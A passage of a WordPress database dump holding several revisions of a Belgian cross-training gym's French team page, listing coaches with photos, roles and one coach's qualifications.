style=\"border: 1px; padding: 5px;\">\r\n<h2>Baptiste Pitsaer</h2>\r\nCoatch</td>\r\n</tr>\r\n</tbody>\r\n</table>\r\n</div></td>\r\n<td style=\"border: 1px; padding: 5px;\">\r\n<div class=\"arrondi\">\r\n<table style=\"border: 1px; width: 100%;\">\r\n<tbody>\r\n<tr style=\"background-color: #ffffff;\">\r\n<td style=\"border: 1px; padding: 5px;\"><a href=\"http://www.crosstrainingcenter.be/wp-content/uploads/2013/06/rg.jpg\"><img class=\"size-full wp-image-130 alignleft\" alt=\"rg\" src=\"http://www.crosstrainingcenter.be/wp-content/uploads/2013/06/rg.jpg\" width=\"132\" height=\"195\" /></a></td>\r\n<td style=\"border: 1px; padding: 5px;\">\r\n<h2>Anaïs Gosset</h2>\r\nCoatch</td>\r\n</tr>\r\n</tbody>\r\n</table>\r\n</div></td>\r\n</tr>\r\n</tbody>\r\n</table>', 'L\'équipe', '', 'inherit', 'open', 'open', '', '20-revision-16', '', '', '2013-07-03 19:06:30', '2013-07-03 19:06:30', '', 20, 'http://www.crosstrainingcenter.be/?p=238', 0, 'revision', '', 0),
(240, 1, '2013-07-03 19:35:31', '2013-07-03 19:35:31', '<table style=\"border: 1px; width: 100%;\">\r\n<tbody>\r\n<tr style=\"background-color: #ffffff;\">\r\n<td style=\"border: 1px; padding: 5px;\">\r\n<div class=\"arrondi\">\r\n<table style=\"border: 1px; width: 100%;\">\r\n<tbody>\r\n<tr style=\"background-color: #ffffff;\">\r\n<td style=\"border: 1px; padding: 5px;\"><a href=\"http://www.crosstrainingcenter.be/wp-content/uploads/2013/07/julie_pierrard-pti.jpg\"><img class=\" wp-image-235 alignleft\" alt=\"julie_pierrard-pti\" src=\"http://www.crosstrainingcenter.be/wp-content/uploads/2013/07/julie_pierrard-pti.jpg\" width=\"180\" height=\"234\" /></a></td>\r\n<td style=\"border: 1px; padding: 5px;\">\r\n<h2>Julie Pierrard</h2>\r\nGérante\r\nCoatch\r\nDiététicienne</td>\r\n</tr>\r\n</tbody>\r\n</table>\r\n</div></td>\r\n<td style=\"border: 1px; padding: 5px;\">\r\n<div class=\"arrondi\">\r\n<table style=\"border: 1px; width: 100%;\">\r\n<tbody>\r\n<tr style=\"background-color: #ffffff;\">\r\n<td style=\"border: 1px; padding: 5px;\"><a href=\"http://www.crosstrainingcenter.be/wp-content/uploads/2013/07/damien_pierrard-pti.jpg\"><img class=\" wp-image-233 alignleft\" alt=\"damien_pierrard-pti\" src=\"http://www.crosstrainingcenter.be/wp-content/uploads/2013/07/damien_pierrard-pti.jpg\" width=\"180\" height=\"234\" /></a></td>\r\n<td style=\"border: 1px; padding: 5px;\">\r\n<h2>Damien Pierrard</h2>\r\nFormateur\r\nCoatch</td>\r\n</tr>\r\n</tbody>\r\n</table>\r\n</div></td>\r\n</tr>\r\n<tr style=\"background-color: #ffffff;\">\r\n<td style=\"border: 1px; padding: 5px;\">\r\n<div class=\"arrondi\">\r\n<table style=\"border: 1px; width: 100%;\">\r\n<tbody>\r\n<tr style=\"background-color: #ffffff;\">\r\n<td style=\"border: 1px; padding: 5px;\"><a href=\"http://www.crosstrainingcenter.be/wp-content/uploads/2013/07/guelor-pti.jpg\"><img class=\" wp-image-234 alignleft\" alt=\"guelor-pti\" src=\"http://www.crosstrainingcenter.be/wp-content/uploads/2013/07/guelor-pti.jpg\" width=\"180\" height=\"235\" /></a></td>\r\n<td style=\"border: 1px; padding: 5px;\">\r\n<h2>Guélor Luabeya</h2>\r\nFormateur\r\nCoatch</td>\r\n</tr>\r\n</tbody>\r\n</table>\r\n</div></td>\r\n<td style=\"border: 1px; padding: 5px;\">\r\n<div class=\"arrondi\">\r\n<table style=\"border: 1px; width: 100%;\">\r\n<tbody>\r\n<tr style=\"background-color: #ffffff;\">\r\n<td style=\"border: 1px; padding: 5px;\"><a href=\"http://www.crosstrainingcenter.be/wp-content/uploads/2013/07/mathieu_gille-pti.jpg\"><img class=\" wp-image-237 alignleft\" alt=\"mathieu_gille-pti\" src=\"http://www.crosstrainingcenter.be/wp-content/uploads/2013/07/mathieu_gille-pti.jpg\" width=\"180\" height=\"233\" /></a></td>\r\n<td style=\"border: 1px; padding: 5px;\">\r\n<h2>Matthieu Gille</h2>\r\nCoatch</td>\r\n</tr>\r\n</tbody>\r\n</table>\r\n</div></td>\r\n</tr>\r\n<tr style=\"background-color: #ffffff;\">\r\n<td style=\"border: 1px; padding: 5px;\">\r\n<div class=\"arrondi\">\r\n<table style=\"border: 1px; width: 100%;\">\r\n<tbody>\r\n<tr style=\"background-color: #ffffff;\">\r\n<td style=\"border: 1px; padding: 5px;\"><a href=\"http://www.crosstrainingcenter.be/wp-content/uploads/2013/07/bertrand_bauwin-pti.jpg\"><img class=\" wp-image-232 alignleft\" alt=\"bertrand_bauwin-pti\" src=\"http://www.crosstrainingcenter.be/wp-content/uploads/2013/07/bertrand_bauwin-pti.jpg\" width=\"180\" height=\"234\" /></a></td>\r\n<td style=\"border: 1px; padding: 5px;\">\r\n<h2>Bertrand Bauwin</h2>\r\nCoatch</td>\r\n</tr>\r\n</tbody>\r\n</table>\r\n</div></td>\r\n<td style=\"border: 1px; padding: 5px;\">\r\n<div class=\"arrondi\">\r\n<table style=\"border: 1px; width: 100%;\">\r\n<tbody>\r\n<tr style=\"background-color: #ffffff;\">\r\n<td style=\"border: 1px; padding: 5px;\"><a href=\"http://www.crosstrainingcenter.be/wp-content/uploads/2013/07/julien_meulemans-pti.jpg\"><img class=\" wp-image-236 alignleft\" alt=\"julien_meulemans-pti\" src=\"http://www.crosstrainingcenter.be/wp-content/uploads/2013/07/julien_meulemans-pti.jpg\" width=\"180\" height=\"234\" /></a></td>\r\n<td style=\"border: 1px; padding: 5px;\">\r\n<h2>Julien Meulemans</h2>\r\nCoatch</td>\r\n</tr>\r\n</tbody>\r\n</table>\r\n</div></td>\r\n</tr>\r\n<tr style=\"background-color: #ffffff;\">\r\n<td style=\"border: 1px; padding: 5px;\">\r\n<div class=\"arrondi\">\r\n<table style=\"border: 1px; width: 100%;\">\r\n<tbody>\r\n<tr style=\"background-color: #ffffff;\">\r\n<td style=\"border: 1px; padding: 5px;\"><a href=\"http://www.crosstrainingcenter.be/wp-content/uploads/2013/06/rg.jpg\"><img class=\"size-full wp-image-130 alignleft\" alt=\"rg\" src=\"http://www.crosstrainingcenter.be/wp-content/uploads/2013/06/rg.jpg\" width=\"132\" height=\"195\" /></a></td>\r\n<td style=\"border: 1px; padding: 5px;\">\r\n<h2>Baptiste Pitsaer</h2>\r\nCoatch</td>\r\n</tr>\r\n</tbody>\r\n</table>\r\n</div></td>\r\n<td style=\"border: 1px; padding: 5px;\">\r\n<div class=\"arrondi\">\r\n<table style=\"border: 1px; width: 100%;\">\r\n<tbody>\r\n<tr style=\"background-color: #ffffff;\">\r\n<td style=\"border: 1px; padding: 5px;\"><a href=\"http://www.crosstrainingcenter.be/wp-content/uploads/2013/06/rg.jpg\"><img class=\"size-full wp-image-130 alignleft\" alt=\"rg\" src=\"http://www.crosstrainingcenter.be/wp-content/uploads/2013/06/rg.jpg\" width=\"132\" height=\"195\" /></a></td>\r\n<td style=\"border: 1px; padding: 5px;\">\r\n<h2>Anaïs Gosset</h2>\r\nCoatch</td>\r\n</tr>\r\n</tbody>\r\n</table>\r\n</div></td>\r\n</tr>\r\n</tbody>\r\n</table>', 'L\'équipe', '', 'inherit', 'open', 'open', '', '20-revision-18', '', '', '2013-07-03 19:35:31', '2013-07-03 19:35:31', '', 20, 'http://www.crosstrainingcenter.be/?p=240', 0, 'revision', '', 0),
(239, 1, '2013-07-03 19:33:18', '2013-07-03 19:33:18', '<table style=\"border: 1px; width: 100%;\">\r\n<tbody>\r\n<tr style=\"background-color: #ffffff;\">\r\n<td style=\"border: 1px; padding: 5px;\">\r\n<div class=\"arrondi\">\r\n<table style=\"border: 1px; width: 100%;\">\r\n<tbody>\r\n<tr style=\"background-color: #ffffff;\">\r\n<td style=\"border: 1px; padding: 5px;\"><a href=\"http://www.crosstrainingcenter.be/wp-content/uploads/2013/07/julie_pierrard-pti.jpg\"><img class=\" wp-image-235 alignleft\" alt=\"julie_pierrard-pti\" src=\"http://www.crosstrainingcenter.be/wp-content/uploads/2013/07/julie_pierrard-pti.jpg\" width=\"180\" height=\"234\" /></a></td>\r\n<td style=\"border: 1px; padding: 5px;\">\r\n<h2>Julie Pierrard</h2>\r\nGérante\r\nCoatch\r\nDiététicienne</td>\r\n</tr>\r\n</tbody>\r\n</table>\r\n</div></td>\r\n<td style=\"border: 1px; padding: 5px;\">\r\n<div class=\"arrondi\">\r\n<table style=\"border: 1px; width: 100%;\">\r\n<tbody>\r\n<tr style=\"background-color: #ffffff;\">\r\n<td style=\"border: 1px; padding: 5px;\"><a href=\"http://www.crosstrainingcenter.be/wp-content/uploads/2013/07/damien_pierrard-pti.jpg\"><img class=\" wp-image-233 alignleft\" alt=\"damien_pierrard-pti\" src=\"http://www.crosstrainingcenter.be/wp-content/uploads/2013/07/damien_pierrard-pti.jpg\" width=\"180\" height=\"234\" /></a></td>\r\n<td style=\"border: 1px; padding: 5px;\">\r\n<h2>Damien Pierrard</h2>\r\nFormateur\r\nCoatch</td>\r\n</tr>\r\n</tbody>\r\n</table>\r\n</div></td>\r\n</tr>\r\n<tr style=\"background-color: #ffffff;\">\r\n<td style=\"border: 1px; padding: 5px;\">\r\n<div class=\"arrondi\">\r\n<table style=\"border: 1px; width: 100%;\">\r\n<tbody>\r\n<tr style=\"background-color: #ffffff;\">\r\n<td style=\"border: 1px; padding: 5px;\"><a href=\"http://www.crosstrainingcenter.be/wp-content/uploads/2013/06/rg.jpg\"><img class=\"size-full wp-image-130 alignleft\" alt=\"rg\" src=\"http://www.crosstrainingcenter.be/wp-content/uploads/2013/06/rg.jpg\" width=\"132\" height=\"195\" /></a></td>\r\n<td style=\"border: 1px; padding: 5px;\">\r\n<h2>Guélor Luabeya</h2>\r\nFormateur\r\nCoatch</td>\r\n</tr>\r\n</tbody>\r\n</table>\r\n</div></td>\r\n<td style=\"border: 1px; padding: 5px;\">\r\n<div class=\"arrondi\">\r\n<table style=\"border: 1px; width: 100%;\">\r\n<tbody>\r\n<tr style=\"background-color: #ffffff;\">\r\n<td style=\"border: 1px; padding: 5px;\"><a href=\"http://www.crosstrainingcenter.be/wp-content/uploads/2013/06/rg.jpg\"><img class=\"size-full wp-image-130 alignleft\" alt=\"rg\" src=\"http://www.crosstrainingcenter.be/wp-content/uploads/2013/06/rg.jpg\" width=\"132\" height=\"195\" /></a></td>\r\n<td style=\"border: 1px; padding: 5px;\">\r\n<h2>Matthieu Gille</h2>\r\nCoatch</td>\r\n</tr>\r\n</tbody>\r\n</table>\r\n</div></td>\r\n</tr>\r\n<tr style=\"background-color: #ffffff;\">\r\n<td style=\"border: 1px; padding: 5px;\">\r\n<div class=\"arrondi\">\r\n<table style=\"border: 1px; width: 100%;\">\r\n<tbody>\r\n<tr style=\"background-color: #ffffff;\">\r\n<td style=\"border: 1px; padding: 5px;\"><a href=\"http://www.crosstrainingcenter.be/wp-content/uploads/2013/06/rg.jpg\"><img class=\"size-full wp-image-130 alignleft\" alt=\"rg\" src=\"http://www.crosstrainingcenter.be/wp-content/uploads/2013/06/rg.jpg\" width=\"132\" height=\"195\" /></a></td>\r\n<td style=\"border: 1px; padding: 5px;\">\r\n<h2>Bertrand Bauwin</h2>\r\nCoatch</td>\r\n</tr>\r\n</tbody>\r\n</table>\r\n</div></td>\r\n<td style=\"border: 1px; padding: 5px;\">\r\n<div class=\"arrondi\">\r\n<table style=\"border: 1px; width: 100%;\">\r\n<tbody>\r\n<tr style=\"background-color: #ffffff;\">\r\n<td style=\"border: 1px; padding: 5px;\"><a href=\"http://www.crosstrainingcenter.be/wp-content/uploads/2013/06/rg.jpg\"><img class=\"size-full wp-image-130 alignleft\" alt=\"rg\" src=\"http://www.crosstrainingcenter.be/wp-content/uploads/2013/06/rg.jpg\" width=\"132\" height=\"195\" /></a></td>\r\n<td style=\"border: 1px; padding: 5px;\">\r\n<h2>Julien Meulemans</h2>\r\nCoatch</td>\r\n</tr>\r\n</tbody>\r\n</table>\r\n</div></td>\r\n</tr>\r\n<tr style=\"background-color: #ffffff;\">\r\n<td style=\"border: 1px; padding: 5px;\">\r\n<div class=\"arrondi\">\r\n<table style=\"border: 1px; width: 100%;\">\r\n<tbody>\r\n<tr style=\"background-color: #ffffff;\">\r\n<td style=\"border: 1px; padding: 5px;\"><a href=\"http://www.crosstrainingcenter.be/wp-content/uploads/2013/06/rg.jpg\"><img class=\"size-full wp-image-130 alignleft\" alt=\"rg\" src=\"http://www.crosstrainingcenter.be/wp-content/uploads/2013/06/rg.jpg\" width=\"132\" height=\"195\" /></a></td>\r\n<td style=\"border: 1px; padding: 5px;\">\r\n<h2>Baptiste Pitsaer</h2>\r\nCoatch</td>\r\n</tr>\r\n</tbody>\r\n</table>\r\n</div></td>\r\n<td style=\"border: 1px; padding: 5px;\">\r\n<div class=\"arrondi\">\r\n<table style=\"border: 1px; width: 100%;\">\r\n<tbody>\r\n<tr style=\"background-color: #ffffff;\">\r\n<td style=\"border: 1px; padding: 5px;\"><a href=\"http://www.crosstrainingcenter.be/wp-content/uploads/2013/06/rg.jpg\"><img class=\"size-full wp-image-130 alignleft\" alt=\"rg\" src=\"http://www.crosstrainingcenter.be/wp-content/uploads/2013/06/rg.jpg\" width=\"132\" height=\"195\" /></a></td>\r\n<td style=\"border: 1px; padding: 5px;\">\r\n<h2>Anaïs Gosset</h2>\r\nCoatch</td>\r\n</tr>\r\n</tbody>\r\n</table>\r\n</div></td>\r\n</tr>\r\n</tbody>\r\n</table>', 'L\'équipe', '', 'inherit', 'open', 'open', '', '20-revision-17', '', '', '2013-07-03 19:33:18', '2013-07-03 19:33:18', '', 20, 'http://www.crosstrainingcenter.be/?p=239', 0, 'revision', '', 0);
INSERT INTO `www_posts` (`ID`, `post_author`, `post_date`, `post_date_gmt`, `post_content`, `post_title`, `post_excerpt`, `post_status`, `comment_status`, `ping_status`, `post_password`, `post_name`, `to_ping`, `pinged`, `post_modified`, `post_modified_gmt`, `post_content_filtered`, `post_parent`, `guid`, `menu_order`, `post_type`, `post_mime_type`, `comment_count`) VALUES
(242, 1, '2013-07-03 19:38:46', '2013-07-03 19:38:46', '<table style=\"border: 1px; width: 100%;\">\r\n<tbody>\r\n<tr style=\"background-color: #ffffff;\">\r\n<td style=\"border: 1px; padding: 5px;\">\r\n<div class=\"arrondi\">\r\n<table style=\"border: 1px; width: 100%;\">\r\n<tbody>\r\n<tr style=\"background-color: #ffffff;\">\r\n<td style=\"border: 1px; padding: 5px;\"><a href=\"http://www.crosstrainingcenter.be/wp-content/uploads/2013/07/julie_pierrard-pti.jpg\"><img class=\" wp-image-235 alignleft\" alt=\"julie_pierrard-pti\" src=\"http://www.crosstrainingcenter.be/wp-content/uploads/2013/07/julie_pierrard-pti.jpg\" width=\"162\" height=\"211\" /></a></td>\r\n<td style=\"border: 1px; padding: 5px;\">\r\n<h2>Julie Pierrard</h2>\r\nGérante\r\nCoatch\r\nDiététicienne</td>\r\n</tr>\r\n</tbody>\r\n</table>\r\n</div></td>\r\n<td style=\"border: 1px; padding: 5px;\">\r\n<div class=\"arrondi\">\r\n<table style=\"border: 1px; width: 100%;\">\r\n<tbody>\r\n<tr style=\"background-color: #ffffff;\">\r\n<td style=\"border: 1px; padding: 5px;\"><a href=\"http://www.crosstrainingcenter.be/wp-content/uploads/2013/07/damien_pierrard-pti.jpg\"><img class=\" wp-image-233 alignleft\" alt=\"damien_pierrard-pti\" src=\"http://www.crosstrainingcenter.be/wp-content/uploads/2013/07/damien_pierrard-pti.jpg\" width=\"180\" height=\"234\" /></a></td>\r\n<td style=\"border: 1px; padding: 5px;\">\r\n<h2>Damien Pierrard</h2>\r\nFormateur\r\nCoatch</td>\r\n</tr>\r\n</tbody>\r\n</table>\r\n</div></td>\r\n</tr>\r\n<tr style=\"background-color: #ffffff;\">\r\n<td style=\"border: 1px; padding: 5px;\">\r\n<div class=\"arrondi\">\r\n<table style=\"border: 1px; width: 100%;\">\r\n<tbody>\r\n<tr style=\"background-color: #ffffff;\">\r\n<td style=\"border: 1px; padding: 5px;\"><a href=\"http://www.crosstrainingcenter.be/wp-content/uploads/2013/07/guelor-pti.jpg\"><img class=\" wp-image-234 alignleft\" alt=\"guelor-pti\" src=\"http://www.crosstrainingcenter.be/wp-content/uploads/2013/07/guelor-pti.jpg\" width=\"180\" height=\"235\" /></a></td>\r\n<td style=\"border: 1px; padding: 5px;\">\r\n<h2>Guélor Luabeya</h2>\r\nFormateur\r\nCoatch</td>\r\n</tr>\r\n</tbody>\r\n</table>\r\n</div></td>\r\n<td style=\"border: 1px; padding: 5px;\">\r\n<div class=\"arrondi\">\r\n<table style=\"border: 1px; width: 100%;\">\r\n<tbody>\r\n<tr style=\"background-color: #ffffff;\">\r\n<td style=\"border: 1px; padding: 5px;\"><a href=\"http://www.crosstrainingcenter.be/wp-content/uploads/2013/07/mathieu_gille-pti.jpg\"><img class=\" wp-image-237 alignleft\" alt=\"mathieu_gille-pti\" src=\"http://www.crosstrainingcenter.be/wp-content/uploads/2013/07/mathieu_gille-pti.jpg\" width=\"180\" height=\"233\" /></a></td>\r\n<td style=\"border: 1px; padding: 5px;\">\r\n<h2>Matthieu Gille</h2>\r\nCoatch</td>\r\n</tr>\r\n</tbody>\r\n</table>\r\n</div></td>\r\n</tr>\r\n<tr style=\"background-color: #ffffff;\">\r\n<td style=\"border: 1px; padding: 5px;\">\r\n<div class=\"arrondi\">\r\n<table style=\"border: 1px; width: 100%;\">\r\n<tbody>\r\n<tr style=\"background-color: #ffffff;\">\r\n<td style=\"border: 1px; padding: 5px;\"><a href=\"http://www.crosstrainingcenter.be/wp-content/uploads/2013/07/bertrand_bauwin-pti.jpg\"><img class=\" wp-image-232 alignleft\" alt=\"bertrand_bauwin-pti\" src=\"http://www.crosstrainingcenter.be/wp-content/uploads/2013/07/bertrand_bauwin-pti.jpg\" width=\"180\" height=\"234\" /></a></td>\r\n<td style=\"border: 1px; padding: 5px;\">\r\n<h2>Bertrand Bauwin</h2>\r\nCoatch\r\n\r\nBaccalauréat en éducation physique\r\nSpécialisation en psychomotricité\r\nPréparateur physique et entraineur de football diplômé de l’URBSFA\r\nEnseignant en éducation physique\r\nPratiquant de foot, triathlon, tennis et VTT</td>\r\n</tr>\r\n</tbody>\r\n</table>\r\n</div></td>\r\n<td style=\"border: 1px; padding: 5px;\">\r\n<div class=\"arrondi\">\r\n<table style=\"border: 1px; width: 100%;\">\r\n<tbody>\r\n<tr style=\"background-color: #ffffff;\">\r\n<td style=\"border: 1px; padding: 5px;\"><a href=\"http://www.crosstrainingcenter.be/wp-content/uploads/2013/07/julien_meulemans-pti.jpg\"><img class=\" wp-image-236 alignleft\" alt=\"julien_meulemans-pti\" src=\"http://www.crosstrainingcenter.be/wp-content/uploads/2013/07/julien_meulemans-pti.jpg\" width=\"180\" height=\"234\" /></a></td>\r\n<td style=\"border: 1px; padding: 5px;\">\r\n<h2>Julien Meulemans</h2>\r\nCoatch</td>\r\n</tr>\r\n</tbody>\r\n</table>\r\n</div></td>\r\n</tr>\r\n</tbody>\r\n</table>', 'L\'équipe', '', 'inherit', 'open', 'open', '', '20-revision-20', '', '', '2013-07-03 19:38:46', '2013-07-03 19:38:46', '', 20, 'http://www.crosstrainingcenter.be/?p=242', 0, 'revision', '', 0),
(243, 1, '2013-07-03 19:39:31', '2013-07-03 19:39:31', '<table style=\"border: 1px; width: 100%;\">\r\n<tbody>\r\n<tr style=\"background-color: #ffffff;\">\r\n<td style=\"border: 1px; padding: 5px;\">\r\n<div class=\"arrondi\">\r\n<table style=\"border: 1px; width: 100%;\">\r\n<tbody>\r\n<tr style=\"background-color: #ffffff;\">\r\n<td style=\"border: 1px; padding: 5px;\"><a href=\"http://www.crosstrainingcenter.be/wp-content/uploads/2013/07/julie_pierrard-pti.jpg\"><img class=\" wp-image-235 alignleft\" alt=\"julie_pierrard-pti\" src=\"http://www.crosstrainingcenter.be/wp-content/uploads/2013/07/julie_pierrard-pti.jpg\" width=\"162\" height=\"211\" /></a></td>\r\n<td style=\"border: 1px; padding: 5px;\">\r\n<h2>Julie Pierrard</h2>\r\nGérante\r\nCoatch\r\nDiététicienne</td>\r\n</tr>\r\n</tbody>\r\n</table>\r\n</div></td>\r\n<td style=\"border: 1px; padding: 5px;\">\r\n<div class=\"arrondi\">\r\n<table style=\"border: 1px; width: 100%;\">\r\n<tbody>\r\n<tr style=\"background-color: #ffffff;\">\r\n<td style=\"border: 1px; padding: 5px;\"><a href=\"http://www.crosstrainingcenter.be/wp-content/uploads/2013/07/damien_pierrard-pti.jpg\"><img class=\" wp-image-233 alignleft\" alt=\"damien_pierrard-pti\" src=\"http://www.crosstrainingcenter.be/wp-content/uploads/2013/07/damien_pierrard-pti.jpg\" width=\"180\" height=\"234\" /></a></td>\r\n<td style=\"border: 1px; padding: 5px;\">\r\n<h2>Damien Pierrard</h2>\r\nFormateur\r\nCoatch</td>\r\n</tr>\r\n</tbody>\r\n</table>\r\n</div></td>\r\n</tr>\r\n<tr style=\"background-color: #ffffff;\">\r\n<td style=\"border: 1px; padding: 5px;\">\r\n<div class=\"arrondi\">\r\n<table style=\"border: 1px; width: 100%;\">\r\n<tbody>\r\n<tr style=\"background-color: #ffffff;\">\r\n<td style=\"border: 1px; padding: 5px;\"><a href=\"http://www.crosstrainingcenter.be/wp-content/uploads/2013/07/guelor-pti.jpg\"><img class=\" wp-image-234 alignleft\" alt=\"guelor-pti\" src=\"http://www.crosstrainingcenter.be/wp-content/uploads/2013/07/guelor-pti.jpg\" width=\"180\" height=\"235\" /></a></td>\r\n<td style=\"border: 1px; padding: 5px;\">\r\n<h2>Guélor Luabeya</h2>\r\nFormateur\r\nCoatch</td>\r\n</tr>\r\n</tbody>\r\n</table>\r\n</div></td>\r\n<td style=\"border: 1px; padding: 5px;\">\r\n<div class=\"arrondi\">\r\n<table style=\"border: 1px; width: 100%;\">\r\n<tbody>\r\n<tr style=\"background-color: #ffffff;\">\r\n<td style=\"border: 1px; padding: 5px;\"><a href=\"http://www.crosstrainingcenter.be/wp-content/uploads/2013/07/mathieu_gille-pti.jpg\"><img class=\" wp-image-237 alignleft\" alt=\"mathieu_gille-pti\" src=\"http://www.crosstrainingcenter.be/wp-content/uploads/2013/07/mathieu_gille-pti.jpg\" width=\"180\" height=\"233\" /></a></td>\r\n<td style=\"border: 1px; padding: 5px;\">\r\n<h2>Matthieu Gille</h2>\r\nCoatch</td>\r\n</tr>\r\n</tbody>\r\n</table>\r\n</div></td>\r\n</tr>\r\n<tr style=\"background-color: #ffffff;\">\r\n<td style=\"border: 1px; padding: 5px;\">\r\n<div class=\"arrondi\">\r\n<table style=\"border: 1px; width: 100%;\">\r\n<tbody>\r\n<tr style=\"background-color: #ffffff;\">\r\n<td style=\"border: 1px; padding: 5px;\"><a href=\"http://www.crosstrainingcenter.be/wp-content/uploads/2013/07/bertrand_bauwin-pti.jpg\"><img class=\" wp-image-232 alignleft\" alt=\"bertrand_bauwin-pti\" src=\"http://www.crosstrainingcenter.be/wp-content/uploads/2013/07/bertrand_bauwin-pti.jpg\" width=\"180\" height=\"234\" /></a></td>\r\n<td style=\"border: 1px; padding: 5px;\">\r\n<h2>Bertrand Bauwin</h2>\r\nCoatch\r\n<ul>\r\n	<li>Baccalauréat en éducation physique</li>\r\n	<li>Spécialisation en psychomotricité</li>\r\n	<li>Préparateur physique et entraineur de football diplômé de l’URBSFA</li>\r\n	<li>Enseignant en éducation physique</li>\r\n	<li>Pratiquant de foot, triathlon, tennis et VTT</li>\r\n</ul>\r\n</td>\r\n</tr>\r\n</tbody>\r\n</table>\r\n</div></td>\r\n<td style=\"border: 1px; padding: 5px;\">\r\n<div class=\"arrondi\">\r\n<table style=\"border: 1px; width: 100%;\">\r\n<tbody>\r\n<tr style=\"background-color: #ffffff;\">\r\n<td style=\"border: 1px; padding: 5px;\"><a href=\"http://www.crosstrainingcenter.be/wp-content/uploads/2013/07/julien_meulemans-pti.jpg\"><img class=\" wp-image-236 alignleft\" alt=\"julien_meulemans-pti\" src=\"http://www.crosstrainingcenter.be/wp-content/uploads/2013/07/julien_meulemans-pti.jpg\" width=\"180\" height=\"234\" /></a></td>\r\n<td style=\"border: 1px; padding: 5px;\">\r\n<h2>Julien Meulemans</h2>\r\nCoatch</td>\r\n</tr>\r\n</tbody>\r\n</table>\r\n</div></td>\r\n</tr>\r\n</tbody>\r\n</table>', 'L\'équipe', '', 'inherit', 'open', 'open', '', '20-revision-21', '', '', '2013-07-03 19:39:31', '2013-07-03 19:39:31', '', 20, 'http://www.crosstrainingcenter.be/?p=243', 0, 'revision', '', 0),
(244, 1, '2013-07-03 19:39:55', '2013-07-03 19:39:55', '<table style=\"border: 1px; width: 100%;\">\r\n<tbody>\r\n<tr style=\"background-color: #ffffff;\">\r\n<td style=\"border: 1px; padding: 5px;\">\r\n<div class=\"arrondi\">\r\n<table style=\"border: 1px; width: 100%;\">\r\n<tbody>\r\n<tr style=\"background-color: #ffffff;\">\r\n<td style=\"border: 1px; padding: 5px;\"><a href=\"http://www.crosstrainingcenter.be/wp-content/uploads/2013/07/julie_pierrard-pti.jpg\"><img class=\" wp-image-235 alignleft\" alt=\"julie_pierrard-pti\" src=\"http://www.crosstrainingcenter.be/wp-content/uploads/2013/07/julie_pierrard-pti.jpg\" width=\"162\" height=\"211\" /></a></td>\r\n<td style=\"border: 1px; padding: 5px;\">\r\n<h2>Julie Pierrard</h2>\r\nGérante\r\nCoatch\r\nDiététicienne</td>\r\n</tr>\r\n</tbody>\r\n</table>\r\n</div></td>\r\n<td style=\"border: 1px; padding: 5px;\">\r\n<div class=\"arrondi\">\r\n<table style=\"border: 1px; width: 100%;\">\r\n<tbody>\r\n<tr style=\"background-color: #ffffff;\">\r\n<td style=\"border: 1px; padding: 5px;\"><a href=\"http://www.crosstrainingcenter.be/wp-content/uploads/2013/07/damien_pierrard-pti.jpg\"><img class=\" wp-image-233 alignleft\" alt=\"damien_pierrard-pti\" src=\"http://www.crosstrainingcenter.be/wp-content/uploads/2013/07/damien_pierrard-pti.jpg\" width=\"180\" height=\"234\" /></a></td>\r\n<td style=\"border: 1px; padding: 5px;\">\r\n<h2>Damien Pierrard</h2>\r\nFormateur\r\nCoatch</td>\r\n</tr>\r\n</tbody>\r\n</table>\r\n</div></td>\r\n</tr>\r\n<tr style=\"background-color: #ffffff;\">\r\n<td style=\"border: 1px; padding: 5px;\">\r\n<div class=\"arrondi\">\r\n<table style=\"border: 1px; width: 100%;\">\r\n<tbody>\r\n<tr style=\"background-color: #ffffff;\">\r\n<td style=\"border: 1px; padding: 5px;\"><a href=\"http://www.crosstrainingcenter.be/wp-content/uploads/2013/07/guelor-pti.jpg\"><img class=\" wp-image-234 alignleft\" alt=\"guelor-pti\" src=\"http://www.crosstrainingcenter.be/wp-content/uploads/2013/07/guelor-pti.jpg\" width=\"180\" height=\"235\" /></a></td>\r\n<td style=\"border: 1px; padding: 5px;\">\r\n<h2>Guélor Luabeya</h2>\r\nFormateur\r\nCoatch</td>\r\n</tr>\r\n</tbody>\r\n</table>\r\n</div></td>\r\n<td style=\"border: 1px; padding: 5px;\">\r\n<div class=\"arrondi\">\r\n<table style=\"border: 1px; width: 100%;\">\r\n<tbody>\r\n<tr style=\"background-color: #ffffff;\">\r\n<td style=\"border: 1px; padding: 5px;\"><a href=\"http://www.crosstrainingcenter.be/wp-content/uploads/2013/07/mathieu_gille-pti.jpg\"><img class=\" wp-image-237 alignleft\" alt=\"mathieu_gille-pti\" src=\"http://www.crosstrainingcenter.be/wp-content/uploads/2013/07/mathieu_gille-pti.jpg\" width=\"180\" height=\"233\" /></a></td>\r\n<td style=\"border: 1px; padding: 5px;\">\r\n<h2>Matthieu Gille</h2>\r\nCoatch</td>\r\n</tr>\r\n</tbody>\r\n</table>\r\n</div></td>\r\n</tr>\r\n<tr style=\"background-color: #ffffff;\">\r\n<td style=\"border: 1px; padding: 5px;\">\r\n<div class=\"arrondi\">\r\n<table style=\"border: 1px; width: 100%;\">\r\n<tbody>\r\n<tr style=\"background-color: #ffffff;\">\r\n<td style=\"border: 1px; padding: 5px;\"><a href=\"http://www.crosstrainingcenter.be/wp-content/uploads/2013/07/bertrand_bauwin-pti.jpg\"><img class=\" wp-image-232 alignleft\" alt=\"bertrand_bauwin-pti\" src=\"http://www.crosstrainingcenter.be/wp-content/uploads/2013/07/bertrand_bauwin-pti.jpg\" width=\"180\" height=\"234\" /></a></td>\r\n<td style=\"border: 1px; padding: 5px;\">\r\n<h2>Bertrand Bauwin</h2>\r\n<h5>Coatch</h5>\r\n<ul>\r\n	<li>Baccalauréat en éducation physique</li>\r\n	<li>Spécialisation en psychomotricité</li>\r\n	<li>Préparateur physique et entraineur de football diplômé de l’URBSFA</li>\r\n	<li>Enseignant en éducation physique</li>\r\n	<li>Pratiquant de foot, triathlon, tennis et VTT</li>\r\n</ul>\r\n</td>\r\n</tr>\r\n</tbody>\r\n</table>\r\n</div></td>\r\n<td style=\"border: 1px; padding: 5px;\">\r\n<div class=\"arrondi\">\r\n<table style=\"border: 1px; width: 100%;\">\r\n<tbody>\r\n<tr style=\"background-color: #ffffff;\">\r\n<td style=\"border: 1px; padding: 5px;\"><a href=\"http://www.crosstrainingcenter.be/wp-content/uploads/2013/07/julien_meulemans-pti.jpg\"><img class=\" wp-image-236 alignleft\" alt=\"julien_meulemans-pti\" src=\"http://www.crosstrainingcenter.be/wp-content/uploads/2013/07/julien_meulemans-pti.jpg\" width=\"180\" height=\"234\" /></a></td>\r\n<td style=\"border: 1px; 